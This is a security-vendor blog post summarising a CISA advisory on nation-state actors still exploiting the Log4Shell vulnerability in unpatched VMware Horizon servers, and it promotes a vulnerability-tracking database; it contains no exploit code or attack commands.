Hackers Are Still Exploiting Log4Shell Vulnerability, Warns CISA
[Update]: CISA has made updates to their initial joint CSA, adding an additional Malware Analysis Report, providing additional indicators of compromise.
Yesterday, CISA and United States Coast Guard Cyber Command (CGCYBER) warned that nation-state hackers are still exploiting Log4Shell (CVE-2021-44228), specifically targeting unpatched, internet-facing VMware Horizon and Unified Access Gateway servers. This has been occurring since December 2021, one month after Log4Shell’s discovery, they said.
“As part of this exploitation, suspected APT actors implanted loader malware on compromised systems with embedded executables enabling remote command and control (C2),” alerted CISA. “In one confirmed compromise, these APT actors were able to move laterally inside the network, gain access to a disaster recovery network, and collect and exfiltrate sensitive data.”
The 1,872 other products affected by Log4Shell
This CISA alert emphasizes the additional care needed by product security teams to identify any software containing at-risk Log4j packages. However, security teams shouldn’t stop at patching VMware Horizon and Unified Access Gateway servers: Our records show that the Log4Shell vulnerability currently affects over 1,800 products.
In our 2021 Year End Vulnerability QuickView Report, we highlighted Log4Shell’s potential for wide-spread impact, observing that it had more references compared to any other vulnerability—including Heartbleed, POODLE, and Spectre v2. And since that report was published, the number of total products affected has risen by 11.6 percent, according to our research. It is likely that the total products affected by Log4Shell will rise as we continue to track the vulnerability.
Log4Shell, tracked as CVE-2021-44228 (CVSS score: 10.0), is a remote code execution vulnerability affecting the Apache Log4j logging library that’s used by a wide range of consumers and enterprise services, websites, applications, and other products.
How to stay on top of vulnerabilities
To protect against Log4Shell exploitation attempts, and other potentially exploitable vulnerabilities, organizations should have an awareness of all known affected vendors and products. To have a more complete understanding, they will also need knowledge of vulnerabilities without CVE IDs.
VulnDB has been tracking this information since Log4Shell’s discovery and aggregating details into its easy-to-use platform. In fact, VMware’s exact vulnerable mechanisms had been explained in our description and solutions information. With that metadata, VulnDB users can ensure that they are not vulnerable to continuous exploitation attempts.
Vulnerabilities and threat actor chatter
In addition to knowing your exposure to critical vulnerabilities and supply chain/third-party weaknesses, it’s also vital for organizations to have an understanding of which vulnerabilities threat actors are actively discussing and seeking to exploit across illicit communities. This crucial context can inform the processes (patching, e.g.) that security teams can actively prioritize in order to remediate potential risk apertures, like Log4Shell.
See Flashpoint’s vulnerability management solutions in action
There are likely many other products aside from VMware and Unified Access Gateway that are currently vulnerable to CVE-2021-44228. Sign up for free VulnDB trial to gain awareness of all the affected vendors and products currently affected by Log4Shell.